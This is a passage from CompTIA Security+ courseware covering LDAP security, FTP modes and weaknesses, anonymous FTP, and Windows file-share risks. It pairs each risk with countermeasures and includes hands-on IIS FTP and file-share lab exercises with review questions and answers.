                     • SASL — This standards-based scheme launches one of several security methods
                       to add encryption to connection-oriented protocols. SASL leverages a variety of
                       methods including TLS and IPSec. When LDAP authentication is used in SASL
                       mode, any method of encryption included in the SASL framework might be used
                       to secure the user authentication operation. TLS/SSL is the most commonly used
                       method with LDAP 3.

                 Authorization
                 After a client has been authenticated and his or her identity has been established, the
                 LDAP server can determine what resources, applications, and services the user is
                 permitted to access. This is called authorization, or access control, and is determined by
                 access control lists (ACLs). For example, ACLs can be entries that state whether a given
                 user has permission to read, write, add, or delete when accessing specific resources.
                 There are no standards for implementing ACLs; each vendor of LDAP products
                 implements ACLs in its own way.

                 Encryption
                 As was noted in the discussion of SASL, most LDAP servers allow their services to be
                 accessed via TLS and SSL. Generally, secure LDAP (LDAPS) servers use port 636 as a
                 standard SSL/TLS socket number. Directory servers can also support custom sockets,
                 but to do so, the client has to identify the appropriate socket to access the directory
                 services on the server through SSL.
                                               Directory and file transfer services   7–7

LDAP security vulnerabilities
Like any directory service, LDAP is a prime target for attacks and tampering. As a
consolidated and unified source of user authentication information (as is the case when
an entire enterprise becomes directory enabled), the LDAP server represents a much
more valuable and hence risk-prone asset compared to other directory servers. This is
because user information previously might have been stored in a variety of locations on
the network, and each location allowed access to only a subset of network resources.
When that information is all brought together in one place, it’s easier to secure—but the
penalties for failing to secure it properly are much higher because a successful attacker
can do much more damage.
The following are some major types of attacks LDAP servers must be secured against:
    • Denial of service — Attacks against an enterprise’s directory server can have
      massive ramifications. Mission-critical applications that rely upon the LDAP
      server for authentication might become unavailable until service is restored.
    • Man-in-the-middle — By tricking a client into authenticating to a bogus server,
      an attacker can gather valuable account information or feed the client false data.
    • Attacks against data confidentiality — The directory information contained in
      the LDAP server is extremely important, so efforts to ensure the directory is
      confidential are critical. Even if LDAP network traffic is encrypted, there are a
      multitude of attacks and exploits that an attacker can use to gain access to an
      LDAP server and the data it contains.

Countermeasures
Extra steps must be taken to secure the LDAP server, including:
    • Apply the latest operating system and application security patches.
    • Remove unneeded services and applications that could potentially present an
      exploitable vulnerability.
    • Configure strong authentication using Kerberos for LDAP v2 or SASL for
      LDAP v3.
    • Block LDAP (typically, TCP/UDP ports 389 and 636) at the firewall.
7–8      CompTIA Security+ Certification

Do it!              A-1:      Understanding directory services
                      Questions and answers
                       1 Information gathered for each network resource is stored as a(n) _________ in the
                         database.
                          A      leaf
                          B      object
                          C      container
                          D      query

                       2 Name three functions that a directory service performs.
                          • Records and organizes information about every user account, server, printer,
                              workstation, and file system on the network.
                          • Grants users access to applications, files, printers, and other network services anywhere
                              on the network with a single login sequence.
                          • Enables the LAN Administrator to track the location and disposition of all network
                              resources.

                       3 LDAP stands for _________________________________.

                          Lightweight Directory Access Protocol

                       4 Name two similarities between X.500 and LDAP.
                          • Both use the same hierarchical database structure and standards.
                          • Both provide authentication and authorization services.
                          • Both are platform-independent.

                       5 Name two differences between X.500 and LDAP.
                          • LDAP runs on TCP/IP; X.500 requires the full OSI protocol stack.
                          • LDAP requires much less computer resources.
                          • LDAP is easier to install than X.500.

                       6 Provide the distinguished name for the following leaf object:

                          Company: Emerald Consulting
                          Department: Information Services
                          Volume: UNIX401_SYSTEM

                          cn= UNIX401_SYSTEM, ou=Information Services, o=Emerald Consulting

                       7 SSO is an authentication process in a client/server environment where a user can
                         enter a single username and password and obtain access to more than one
                         application or network resource. True or false?

                          True
                                             Directory and file transfer services   7–9

8 What are some major types of attacks LDAP servers must be secured against?
  (Choose all that apply.)
  A   Man-in-the-middle
  B   Denial of service
  C   Attacks against data confidentiality
  D   Encryption
7–10      CompTIA Security+ Certification


Topic B: File transfer services
                     This topic covers the following CompTIA Security+ exam objective:

                      #      Objective

                      2.5    Recognize and understand the administration of the following file transfer protocols and
                             concepts
                              • S/FTP (File Transfer Protocol)
                              • Blind FTP (File Transfer protocol) / Anonymous
                              • Vulnerabilities
                                  • Packet Sniffing




                     FTP
Explanation          It is obvious to most people who have downloaded files over the Internet that the ability
                     to share programs and data with other people around the world is an essential aspect of
                     the Internet that continues to drive its explosive growth. This is why file transfer is so
                     critical to today’s networked organizations. An often-overlooked aspect of this is the
                     security and integrity of the typically secret data that businesses need to exchange over
                     the Internet. As incredible and wonderful as the Internet might be, it’s a wild and
                     uncontrolled network and poses a number of risks to your business’s data.
                     One of the most commonly used application protocols on the Internet is File Transfer
                     Protocol (FTP). It’s also one of the most insecure services in use. The reason it is so
                     commonly used is that most FTP clients and servers are free, distributed with most
                     operating systems, and relatively easy to use. System administrators can easily exchange
                     files with remote offices and business partners over the Internet by setting up an FTP
                     server in a matter of minutes and with no additional cost. The list of vulnerabilities and
                     attacks associated with FTP is a long one.
                     FTP was one of the early TCP/IP applications and was designed without the security
                     features of many current applications. To understand FTP’s inherent flaws, one must
                     first understand the mechanism by which FTP authenticates and transfers data between
                     a client and a server. FTP has two standard data transmission methods: active FTP and
                     passive FTP. The terms “active” and “passive” refer to the server’s roll in setting up the
                     TCP session, as shown in Exhibit 7-2.




                     Exhibit 7-2: Setup of the FTP command connection
                                                Directory and file transfer services   7–11

In both active and passive FTP, the client initiates a TCP session using destination port
21 to the server. This is the command connection and is used for authenticating the user
and transferring commands between the client and the server. The command connection
operates just as a normal TCP session should: the client initiates a session using a
predetermined destination port number on the server (for FTP, this is port 21), and a
source port that is a number greater than 1023.
The differences in how the two types of FTP operate are in the data connection that is
set up when the user wants to transfer data between the two machines. For example, if
the user issued FTP’s GET command to download a file (the command might take the
form get resume.doc to download the file resume.doc), the client sends the get
command using the command connection, and then the server negotiates the opening of
a second TCP connection to actually transfer the file’s data.

Active FTP
In active FTP, which is FTP’s default operation, the FTP server creates a data
connection by opening a TCP session using a source port of 20 and a destination port
greater than 1023. This is contrary to TCP’s normal operation in which the destination
port of a new session is fixed and the source port is a random high port above 1023.
Active FTP is an issue because security’s best practices dictate that connections can be
initiated outbound from a trusted network to an untrusted network, but not vice versa. In
a situation in which the client sits behind a firewall of an internal trusted network and
the server is out on the Internet, active FTP breaks this policy. Active FTP requires that
the server initiate a connection inbound to the client to transfer data, as shown in Exhibit
7-3.




Exhibit 7-3: Setup of active FTP data connection

Most modern stateful firewalls accommodate this issue by actually watching the
negotiation between the client and server and automatically opening the agreed upon
port so the client can receive the connection from the server. Simple packet-filtering
firewalls do not have this level of intelligence. To permit active FTP using packet-
filtering firewalls, one must allow all high ports (because one never knows what port
will be negotiated by the client and server) to reach internal clients from outside the
trusted network—a very dangerous proposition. The situation can be slightly mitigated
by only allowing incoming connections from port 20. People seeking to exploit this
weakness could easily craft packets from that port as well.
7–12   CompTIA Security+ Certification

                  Passive FTP
                  In passive FTP, which is not supported by all FTP implementations, the client initiates
                  the data connection to the server (therefore, the server is said to be passive because it’s
                  only accepting a connection instead of originating one). As shown in Exhibit 7-4, the
                  passive FTP client initiates the data connection to the server with a source and
                  destination port that are both random high ports.




                  Exhibit 7-4: Setup of the passive FTP data connection

                  This solves the firewall issue just mentioned, because the client initiates both
                  connections, so the client does not violate his own security policy by allowing an
                  inbound connection from the Internet. This opens up a security issue for the FTP server:
                  now the server must allow inbound connections on all high ports in order to
                  accommodate passive FTP data connections. Most stateful firewalls accommodate this
                  by monitoring the control connection to determine which port is used for the data
                  connection, and then opening that single port between the server and the client. The
                  same issue exists for packet-filtering firewalls which are not equipped to look that
                  deeply into the FTP packet; a packet-filtering firewall that is protecting the active FTP
                  server has to be configured to accept all ports to the server in order to accommodate
                  passive FTP.

                  FTP security issues
                  Some of the better-known FTP security issues are outlined in the following sections.

                  Bounce attack
                  The Bounce attack uses the fact that RFC 959, the standards document outlining FTP,
                  gives the active FTP client the power to cause the FTP server to open a data connection
                  to any IP address on any port. This can be used to anonymously attack other systems on
                  the Internet.
                  RFC 2577, FTP Security Considerations, outlines an example of such an attack. For
                  instance, a client uploads a file containing SMTP commands to an FTP server. Then,
                  using an appropriate PORT command, the client instructs the server to open a
                  connection to a third machine’s SMTP port. Finally, the client instructs the server to
                  transfer the uploaded file containing SMTP commands to the third machine. This might
                  allow the client to forge mail on the third machine without making a direct connection,
                  and makes it difficult to track attackers.
                                                Directory and file transfer services   7–13

Clear text authentication and data transmission
Another vulnerability lies in the fact that FTP traffic is sent unencrypted in clear text.
This includes both the username/password pair and the data itself. Anyone with a packet
sniffer can own a copy of the data transferred via FTP, as well as the login information
used to obtain it.

Glob vulnerability
A nonstandard issue with many FTP implementations is that they permit the client to
use the (*) wildcard in FTP commands. The wildcard is a very useful tool that allows a
user to perform an operation on multiple files at once.
For example, the command del ap* causes the files application.doc and apple.pic to
be deleted. Hackers can exploit this behavior to create buffer overflows and therefore
gain control of the server. This is called the glob vulnerability.

Software exploits and buffer overflow vulnerabilities
There are many known vulnerabilities associated with various implementations of FTP.
For example, a well-documented buffer overflow vulnerability in wu-ftp (a common
FTP server implementation) has been responsible for thousands of compromised UNIX
and Linux boxes.

Anonymous FTP and blind FTP access
The practice of setting up anonymous FTP servers across the Internet is extremely
common. This originates with an FTP server’s default position of allowing anyone
authenticating with the username “anonymous” and any password (good Netizens use
their e-mail address as a password) access to a directory on the server. This practice
allowed people around the world to easily share data and files with the world without
too much overhead or red tape. Many software vendors set up anonymous FTP sites to
distribute updates and patches for their products. FTP search engines exist that make
finding thousands of anonymous FTP sites quick and easy.
The transcript below is from an anonymous FTP session. Information entered by the
user appears in bold typeface:
    C:\ >ftp leech.stat.umn.edu
    Connected to leech.stat.umn.edu.
    220 leech.stat.umn.edu FTP server (Version wu-2.4.2-
    academ[BETA-18](1) Thu Sep 2
     GMT 2001) ready.
    User (leech.stat.umn.edu:(none)): anonymous
    331 Guest login ok, send your complete e-mail address as
    password.
    Password:
    230-Please read the file README
    230- it was last modified on Fri Dec 13 14:14:31 1996 - 2024
    days ago
    230 Guest login ok, access restrictions apply.
    ftp>
In the first line of this transcript, the user issued a command to run the FTP client and
connect to the site called leech.stat.umn.edu. The user could just as easily have
entered the server’s IP address. In the second line, you see the connection was
successful, and in the following line, the FTP server has provided some basic
information about itself. It’s running version 2.4.2 of wu-ftp. The server immediately
provides the User prompt so the user can log on to it.
7–14   CompTIA Security+ Certification

                  Here you see the user provided the login of “anonymous” to get access with visitor
                  privileges. The server has been configured to accept the anonymous login account; it
                  requests the user provide his or her e-mail address as a password, although any string of
                  characters is often accepted by anonymous FTP servers. After the password was
                  entered, the server prints a brief banner message instructing the guest to read the file
                  README. You know the anonymous user credentials were accepted, because the
                  server noted “Guest login ok.” Finally, you see the ftp> prompt, indicating the user is
                  now able to enter an FTP command.
                  Although properly secured and monitored anonymous FTP sites are a valuable and well-
                  used Internet resource, unmonitored anonymous FTP servers can often be used as
                  storehouses for “warez” (pirated software with the copy protection mechanisms
                  removed). Pirates use anonymous FTP sites for storage because they often have more
                  bandwidth than their own Internet connections, making it easy to share and trade their
                  warez. Companies that do not monitor their anonymous FTP sites for this type of
                  behavior risk a black eye in the public relations arena if it becomes known that their
                  servers are used for this type of illegal activity.
                  A potentially worse situation could arise if the anonymous account is not properly
                  restricted to access only designated directories. If an anonymous FTP server is
                  misconfigured and permits anonymous visitors to write to any directory, then malicious
                  visitors could upload files that would result in their gaining root access and control of
                  the server. Even if the malicious user could only read any directory, then he could
                  download files containing user passwords and decrypt them using password cracking
                  tools.
                  If you decide to setup an anonymous FTP server, be sure it’s properly secured. CERT
                  provides a document entitled “Anonymous FTP Configuration Guidelines” to help in
                  this task. It is available at:
                     www.cert.org/tech_tips/anonymous_ftp_config.html.
                  A variant of the anonymous FTP site is a “blind” FTP site. With blind FTP sites, a user
                  logs on as anonymous, but is then restricted to a single directory and is not able to
                  obtain a listing of files in the directory. Blind FTP sites offer more security than
                  anonymous sites, because the user must know the exact filename of a desired file in
                  order to download it. There is still no way to account for who has logged on to the
                  server and accessed a given file. If a user who is given a particular filename by an
                  administrator chooses to share it with others, then the privacy sought by setting up the
                  blind server is compromised.
                                               Directory and file transfer services   7–15

FTP countermeasures
It’s clear from aforementioned issues that FTP is an easy target for hackers. There are,
however, solutions to the FTP quandary:
    • Do not allow anonymous access unless a clear business requirement exists to do
      so.
    • Employ a state-of-the art firewall such as a Cisco PIX or Check Point FireWall-
      1 that performs content inspection of FTP commands.
    • Ensure your FTP server has the latest security patches and that it has been
      properly configured to limit user access.
    • Encrypt your data before placing it on an FTP server, so it cannot be sniffed in
      transit to its destination. The recipient needs the appropriate keys to decrypt the
      data once it has been received.
    • Encrypt the FTP data flow using a Virtual Private Network (VPN) connection.
    • Switch to a secure alternative to FTP, such as the Secure File Transfer Protocol
      outlined in the next section.
7–16          CompTIA Security+ Certification

Do it!                        B-1:   Creating a new FTP site
                               Here’s how                             Here’s why
Students will work in pairs    1 Log on to your server as             (If necessary.) This activity requires that you
for this activity.               administrator                        pair up with a partner. On each server, you and
                                                                      your partner will create an ftp site and test its
                                                                      connection.

                               2 Create a folder called ftp located
                                 in the root directory of your
                                 system

                               3 Click Start and then right click
                                 My Computer

                                 Choose Manage                        The Computer Management window appears.

                               4 Expand Services and
                                 Applications

                               5 Expand Internet
                                 Information Services

                               6 Expand FTP Sites




                               7 Right-click FTP Sites

                                 Choose New, FTP Site…                The FTP Site Creation Wizard will begin.

                               8 Click Next

                               9 Enter My FTP Site                    For the description.

                                 Click Next

                              10 Click Next                           To keep the default settings for the IP Address
                                                                      and TCP Port Settings.

                              11 Click Next                           To accept the default of not isolating users.

                              12 In the path box, type c:\ftp         If your root directory is different than c:\,
                                                                      substitute the root directory on your system.

                              13 Click Next                           The FTP Site Access Permissions screen
                                                                      appears.

                              14 Check Write

                                 Click Next
                                     Directory and file transfer services     7–17

15 Click Finish                   (To close the Wizard.) Notice that your ftp site
                                  is stopped. To start your ftp server, you’ll have
                                  to first stop the Default FTP Site

16 Right-click Default FTP site   In Computer Management.

   Choose Stop

17 Right-click My FTP site
   (Stopped)

   Choose Start

18 Click Start and then choose    To open a Command window. You will try
   Run                            logging onto your partner’s FTP site.

   Type cmd and press e

19 At the command prompt, enter
   ftp

20 At the ftp prompt, type
   open <your partner’s IP address>

   Press e

21 Enter anonymous                As the user.

22 Enter password                 As the password. You will be connected.

23 Enter quit                     To end the ftp session.
7–18          CompTIA Security+ Certification

                         Requiring authentication
Explanation              The default setting for an FTP site is to allow anonymous access; however, there are
                         times when it’s necessary to control access. The Windows Server 2003 FTP Server
                         service has capabilities to remove anonymous access and require user authentication.
                         The major risk when switching to authentication is that the usernames and passwords
                         are sent in clear text, which can be sniffed with a protocol analyzer.

Do it!                   B-2:     Controlling access to the FTP site
                           Here’s how                              Here’s why
                            1 Switch to the Computer               To deny anonymous access to your ftp site.
                              Management window and right-
                              click My FTP Site

                               Choose Properties

                            2 Activate the Security
                              Accounts tab




                            3 Clear Allow anonymous                You’ll receive the message shown below.
                               connections




                               Click Yes

                            4 Click Apply
                                                                      Directory and file transfer services    7–19


       Make sure both
                             5 Switch to the Command window
partners have completed        and enter ftp
step 5 before they
continue with step 6. The    6 At the ftp prompt, enter open
remainder of the activity      <your partner’s IP
might not work correctly.
                               address>

                             7 Enter anonymous                     For the username.

                             8 Enter password                      For the password.

                                                                   The login will fail because a valid account with
                                                                   a password is required.

                                                                   Anonymous access will no longer be allowed,
                                                                   but there is a risk of having the password sniffed
                                                                   on the network.

                             9 At the ftp prompt, enter user       To reattempt login.

                               Enter user1                         For the username.

                               Enter the password for the User 1   You'll be connected.
                               account

                            10 Enter quit                          To end the ftp session.
7–20          CompTIA Security+ Certification

                         The threat of password sniffing
Explanation              Removing anonymous access to an FTP site makes it vulnerable to password sniffing.
                         One way to counter this vulnerability is to restrict access to the site by IP address. A
                         user trying to access the site would have to provide a valid username and password, and
                         would have to access the site from the appropriate computer. This method can be very
                         effective in preventing someone on the outside from using a sniffer to obtain a username

Do it!                   B-3:     Configuring FTP TCP/IP restrictions
                           Here’s how                               Here’s why
                            1 Switch to the Computer
                              Management window

                            2 Activate the Directory
                              Security tab




                            3 Click Add…




                            4 Enter the IP address of your
                              partner’s server

                               Click OK

                            5 Click Apply
                                                                           Directory and file transfer services   7–21


       Make sure both
                             6 Switch to the Command window
partners have completed        and at the ftp prompt, enter open
step 5 before they              <your partner’s IP
continue with step 6. The       address>
remainder of the activity
might not work correctly.
                             7 At the ftp prompt, enter user1           To reattempt login.

                               Enter the password for the User 1        You’ll be denied access because your IP address
                               account                                  has been denied access.

                             8 Enter quit                               (To end the session.)

                             9 Close the Command window

                            10 When both you and your partner
                               are finished testing the ftp
                               connection, return to the Directory
                               Security tab and remove your
                               partner’s IP address

                            11 In Computer Management, stop             Expand Services and Applications, expand
                               the My FTP Site and restart the          Internet Information Services, and expand FTP
                               Default FTP Site                         Sites to stop/start the ftp sites.

                            12 What are the options available for TCP/IP Access Restrictions? (Choose all that
                               apply.)
                                A     Granted access
                                B     Enable access
                                C     Denied access
                                D     Full access

                            13 If an IP address has been denied access to an FTP server:
                                A     Users can logon using the administrator password
                                B     Users can logon using their password
                                C     Users can logon using an Anonymous account
                                D     Users will not be able to access the server

                            14 All IP addresses are granted access by default. True or false?

                               True

                            15 Close Computer Management
7–22      CompTIA Security+ Certification

                     Secure file transfers
Explanation          Several attempts have been made to address FTP’s security shortcomings. RFC 2228,
                     FTP Security Extensions, was released in 1997 to address the issue of FTP’s clear text
                     authentication, but it has not been widely adopted. Several propriety Secure FTP
                     products have also been released by various vendors, offering secure authentication (and
                     in some cases secure data transfer) but have been given a lukewarm reception in the
                     marketplace. Other strategies to secure FTP have involved conducting file transfers
                     through an encrypted tunnel via an SSL or IPSec VPN.

                     S/FTP
                     The most commonly used Secure File Transfer Protocol (S/FTP) is not a rehash of
                     traditional FTP at all, but is a new component of the Secure Shell (SSH) protocol
                     introduced with SSH version 2 (SSH2). The OpenSSH man page offers the following
                     description of S/FTP:
                        S/FTP is an interactive file transfer program, similar to ftp, which performs all
                        operations over an encrypted ssh transport. It might also use many features of ssh,
                        such as public key authentication and compression. S/FTP connects and logs into the
                        specified host, then enters an interactive command mode.
                     The key words in this quote are “similar to ftp,” because of the protocol’s name,
                     “Secure FTP,” one might expect that S/FTP is a method of securing traditional FTP, but
                     it is not. The only relationship between S/FTP and traditional FTP is that S/FTP
                     employs the older variant’s command syntax. Rather than a protocol, S/FTP is an FTP-
                     like program provided as part of the SSH suite to securely transfer files. S/FTP does not
                     provide any new network protocols; it only provides an FTP-like user interface to use
                     the existing SSH2 encryption mechanisms to transfer files.
                     Notice that SSH’s Secure File Transfer Protocol (S/FTP) should not be confused with
                     the Simple File Transfer Protocol (SFTP) defined in RFC 913. The latter is easier to
                     implement than the original FTP, and the former is not a protocol at all, but a program
                     that leverages SSH to securely transfer files between hosts.
                     Secure Shell’s S/FTP standard has a number of benefits over traditional FTP:
                         • S/FTP uses the underlying SSH2 protocol, so it offers strong authentication
                           using a variety of methods including X.509 certificates.
                         • It uses SSH2, S/FTP encrypts authentication, commands, and all data transferred
                           between the client and the server using secure encryption algorithms.
                         • SSH2 uses a single, well-behaved TCP connection (as compared to active FTP,
                           which opens a reverse connection, and passive FTP, which opens a connection
                           on a random high port) it is easy to configure a firewall to permit S/FTP
                           communications. S/FTP uses the same TCP port as SSH2, port 22.
                         • Traditional FTP clients and servers negotiate the IP address and port for opening
                           the data connection, it’s difficult to use Network Address Translation (NAT) on
                           FTP connections. S/FTP avoids this issue altogether because no negotiation is
                           required to open a second connection.
                                               Directory and file transfer services   7–23

The following table displays SecureFTP implementation programs:

 Program      Note

 SSH          The SSH product produced by the company of the same name, offering both
              server and client software.
                  http://ssh.com/support/downloads/
 OpenSSH      An open source version of SSH.
                  http://sshwindows.sourceforge.net/
 PuTTY        A freeware SSH client implementation for Windows operating systems.

              www.chiark.greenend.org.uk/~sgtatham/putty/
7–24     CompTIA Security+ Certification

Do it!              B-4:      Understanding file transfer services
                      Questions and answers
                       1 Provide the TCP port numbers for the following FTP sessions:

                          Active FTP source port                             20

                          Active FTP destination port                        >1023

                          Passive FTP source port                            >1023

                          Passive FTP destination port                       >1023

                          FTP command source port                            >1023

                          FTP command destination port                       21

                       2 FTP traffic is sent unencrypted in clear text. True or false?

                          True

                       3 With blind FTP sites, a user logs on as anonymous, but is then restricted to a
                         single directory and is not able to obtain a listing of files in the directory. True or
                         false?

                          True

                       4 In passive FTP, the server initiates the data connection to the client. True or false?

                          False

                       5 The terms “active” and “passive” in FTP refer to the client’s role in setting up the
                         data connection. True or false?

                          False: It refers to the server’s role.

                       6 Secure File Transfer Protocol (S/FTP) is an extension of FTP. True or false?

                          False: It is a new component of the Secure Shell protocol.

                       7 Audits for file shares should be conducted in complete secrecy. True or false?

                          False: Audits should be conducted with management approval, including any required
                          change management sign-offs, and should be carefully documented.
                                                                     Directory and file transfer services       7–25


Topic C: File sharing
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               2.5   Recognize and understand the administration of the following file transfer protocols and
                     concepts
                      • File Sharing
                      • Vulnerabilities
                          • Packet Sniffing




              File shares
Explanation   A common way of sharing files is using file shares on a Microsoft Windows network.
              This method was originally intended to share files on a local area network (LAN) rather
              than across the Internet as FTP is used, although current versions of Windows allow
              mapping via IP connections. File shares are popular because they are easy to set up, and
              they use the Windows graphical interface. Very little computer knowledge is required
              for people to share files across the network using file shares; one simply views the file’s
              or folder's properties and selects the appropriate check box, as shown in Exhibit 7-5.




              Exhibit 7-5: File sharing in Windows Server 2003

              Shared files can be configured as peer-to-peer (so that multiple desktop computers can
              access files on another desktop computer) or as client/server shares (set up to provide
              users with centralized network storage on a server).
7–26   CompTIA Security+ Certification

                  Vulnerabilities
                  Although file shares seem both harmless and indispensable, there are indeed several
                  risks that security administrators need to manage carefully.
                  First, there is the risk of confidentiality of data, because most users control file sharing
                  on their own desktop computers, they can open shares on their machines that could
                  accidentally become liabilities. Take for example an accountant who shares his My
                  Documents folder to let his coworkers access his collection of MP3 music files. If the
                  accountant accidentally saves a spreadsheet containing the salaries of all employees into
                  the same folder, he could inadvertently give confidential information to people who
                  should not have access to it.
                  Second, there are viruses that spread via network shares. If many users on the network
                  have unmonitored and uncontrolled network shares, they can cause malware such as the
                  Funlove virus to spread rapidly, damaging files and causing huge losses to productivity
                  as administrators battle the infection and workers are unable to perform their functions
                  because their programs no longer work.
                  Finally, other types of critical information besides user documents could become
                  compromised if file shares are misconfigured. One example of this is the C: drive on
                  Windows machines. If the entire drive were accidentally shared, then an attacker has the
                  ability to access important files in the C:\Windows directory. In this case, an attacker
                  could launch a denial-of-service attack on the machine by deleting critical files, or could
                  download the SAM file that contains the username and password of everyone who has
                  ever logged onto the machine. After downloading the SAM file, an attacker can crack it
                  using tools such as L0phtCrack.

                  Protecting your file shares
                  To protect your network from the risks posed by unauthorized file shares, your
                  organization needs to define a policy regarding the use of file shares. After the policy
                  has been defined and communicated to all users as part of a security awareness program,
                  security administrators can take action to ensure the policy is respected by conducting
                  audits of file shares. Audits should be conducted with management approval, including
                  any required change management sign-offs, and should be carefully documented. Most
                  commercial scanning and audit tools can identify file shares.
                  Freeware scanners for file shares include:
                      • Legion — http://packetstormsecurity.org/groups/rhino9
                      • SMBScanner —
                          http://home.ubalt.edu/abento/753/enumeration/enumerationtoo
                          ls.html
                  For more details on how to use these tools and auditing best practices, see Jaime
                  Carpenter’s article entitled “Open File Shares: An Unexpected Business Risk” at the
                  SANS Reading Room ( www.sans.org/rr/).
                                                         Directory and file transfer services   7–27

Do it!   C-1:   Understanding file sharing
          Questions and answers
          1 Which of the following features is true of file sharing?
            A    Can share files on a LAN
            B    Can share files over an IP connection
            C    Can be configured as peer-to-peer
            D    Can be configured as client/server

          2 What are some of the risks associated with file sharing?
            A    Sharing confidential data
            B    Spreading viruses
            C    Compromising system files
            D    All of the above

          3 What are some recommendations for protecting file shares?
            • Define a policy and communicate it to all users
            • Conduct audits of file shares
7–28      CompTIA Security+ Certification


Unit summary: Directory and file transfer
              services
Topic A              In this topic, you learned that LDAP eliminates the necessity to authenticate at multiple
                     servers in order to access different applications and network resources. Using X.500
                     directory services, LDAP simplifies both the logon process and administration of all
                     network resources.
Topic B              In this topic, you learned that ftp is a file transfer mechanism commonly used on the
                     Internet. You learned that ftp is not a secure protocol and that S/FTP, which is based on
                     SSH version 2, is the recommended solution.
Topic C              In this topic, you learned that uncontrolled file shares on Windows networks could be a
                     potential weak spot in many networks. File shares should be centrally administered on
                     file servers, and periodic audits should be conducted to identify and remove
                     unauthorized file shares.

                     Review questions
                       1 Information about network resources is stored as a(n) __________ in the directory
                         services database.
                         object

                       2 A commonly used directory service protocol that was developed by the IETF is
                         __________.
                         LDAP

                       3 The Microsoft implementation of directory services is called
                         ________________________.
                         Active Directory

                       4 PKI, user administration, and single sign-on are some of the applications of LDAP.
                         True or False?
                         True

                       5 List the elements in the X.500 hierarchical structure from the top to the bottom.
                         Root, country, organization, organizational unit, leaf objects

                       6 Distinguished names do not need to be unique. True or False?
                         False

                       7 LDAP provides authentication and authorization services. It also provides
                         encryption by utilizing other protocols. True or False?
                         True

                       8 List the security vulnerabilities you need to protect your LDAP service from.
                         DoS, man-in-the-middle, and attacks against data confidentiality
                                                     Directory and file transfer services      7–29

 9 List the steps you can take to secure the LDAP server from the vulnerabilities that
   can affect it.
   Apply the latest OS and application security patches, remove unneeded services and
   applications, configure strong authentication, block LDAP at the firewall.

10 FTP is one of the most secure services on the Internet. True or False?
   False

11 Which TCP port is used to initiate an FTP session?
   Port 21

12 Compare active FTP and passive FTP.
   In active FTP, which is FTP’s default operation, the FTP server creates a data connection by
   opening a TCP session using a source port of 20 and a destination port greater than 1023. In
   passive FTP, which is not supported by all FTP implementations, the client initiates the data
   connection to the server (therefore, the server is said to be passive because it’s only accepting a
   connection instead of originating one).

13 List some of the FTP security issues you should guard against.
   Bounce attacks, clear text authentication and data transmission, glob vulnerabilities, software
   exploits and buffer overflow vulnerabilities, anonymous FTP and blind FTP access.

14 The default settings for an FTP site is to require usernames and passwords. True or
   False?
   False: The default is anonymous access.

15 How can you prevent password sniffing when users are connecting to an FTP
   server?
   Restrict access to the site by IP address. A user trying to access the site would have to provide a
   valid username and password, and would have to access the site from the appropriate computer.

16 List the vulnerabilities of using Windows file shares.
   Risk to confidentiality of data, viruses spreading via network shares, and other types of critical
   information besides user documents could become compromised if file shares are misconfigured.

17 File shares are peer-to-peer only. True or false?
   False: They can also be client/server shares.

18 List some ways you can protect file shares.
   Establish a policy and communicate it to users. Audit the network to ensure that the policy is
   being followed.

19 List some methods of securing FTP file transfers.
   Using Secure FTP products, conduct file transfers through an encrypted tunnel via SSL or IPSec
   VPN.

20 S/FTP is simply a re-write of the FTP service. True or False?
   False: It is a component of the SSH protocol.
7–30   CompTIA Security+ Certification

                  Independent practice activity
                  In this activity, you’ll configure a file share on a Windows network:
                    1 Open My Documents in Windows.
                    2 Right-click in the right pane and choose New, Folder.
                    3 Rename the new folder to Dangerous.
                    4 Right-click the Dangerous folder, and choose Properties.
                    5 Activate the Sharing tab.
                    6 Select Share this folder.
                    7 Click OK.
                    8 Create a new text document, and save it to the Dangerous folder.
                    9 On another computer in the network browse to Dangerous through My Network
                      Places.
                  10 Open the text file and modify it.
                  11 Were you able to open the file? Were you able to save the file? Why or why not?
                      You should have been able to open the file, but you shouldn’t have been able to save the file.
                      Default permissions on the folder only allow the group Everyone to Read the file.

                  12 On your computer, display properties for the Dangerous folder. Change the
                     permissions for the group Everyone to allow Change. (Activate the Sharing tab,
                     click Permissions…, check Change in the Allow column.)
                  13 On the other computer, try saving the file again.
                  14 Were you able to save it now?
                      Yes

                  15 On the first computer, check the text file for modifications.
                  Next, you’ll scan your own computer for file shares using Legion. This file can be
                  found under packetstormsecurity.nl/groups/rhino9/.
                  16 Download the file legionv21.zip according to your instructor's directions.
                  17 Unzip the file to C:\Security.
                  18 Run the Setup program Setup.exe.
                  19 Click Next at the Welcome screen.
                  20 Click Next at each screen to accept the defaults. Click Finish to exit the
                     installation program.
                  21 Click Start, then choose All Programs, Legion to run the program.
                  22 Enter the starting IP address in the Scan from text boxes.
                  23 Click Scan.
                  24 What file shares were detected on your computer?
                      Dangerous should appear in the share list.

                  25 Close Legion.
                                                                 8–1


Unit 8
Wireless and instant messaging
                        Unit time: 90 minutes

                        Complete this unit, and you’ll know how to:

                        A Discuss 802.11 standards.

                        B Describe the Wireless Application Protocol
                           (WAP) and explain how it works.

                        C Describe Wired Equivalent Privacy (WEP).

                        D Discuss instant messaging.
8–2       CompTIA Security+ Certification


Topic A: IEEE 802.11
                     This topic covers the following CompTIA Security+ exam objective:

                      #       Objective

                      2.6     Recognize and understand the administration of the following wireless technologies and
                              concepts
                                • 802.11 and 802.11x




                     IEEE 802 LMSC
Explanation          In 1980, the Institute of Electrical and Electronics Engineers (IEEE) created the 802
                     LAN/MAN Standards Committee (LMSC). This committee was tasked to create
                     standards of operability related to local area networks (LANs) and metropolitan area
                     networks (MANs). In 1990, the committee formed the 802.11 working group to define
                     the interface between wireless clients and their network access points.
                     The 802.11 working group finalized its first standard in 1997. IEEE 802.11 defines
                     three types of transmission at the Physical (PHY) layer:
                            • Diffused infrared, based on infrared transmissions
                            • Direct sequence spread spectrum (DSSS), based on radio transmissions
                            • Frequency hopping spread spectrum (FHSS), also based on radio transmissions
                     WEP was established as an optional security protocol.
                     The group also specified the use of the 2.4 GHz industrial, scientific and medical (ISM)
                     radio band because it was the only band was available and unlicensed in most countries
                     of the world. Within this band, the group limited its work to the Physical layer and the
                     Media Access Control (MAC) sublayer of the Data Link layer, leaving the Logical Link
                     Control (LLC) sublayer and higher layers of the OSI model to existing standards. The
                     group also mandated a 1 Mbps data transfer rate and an optional 2 Mbps data transfer
                     rate.
                     As the 802.11 project developed, the members of the working group found it necessary
                     to add additional working groups to more efficiently tackle their task. As these
                     subgroups were added, each was designated with a letter, starting with “a” and going
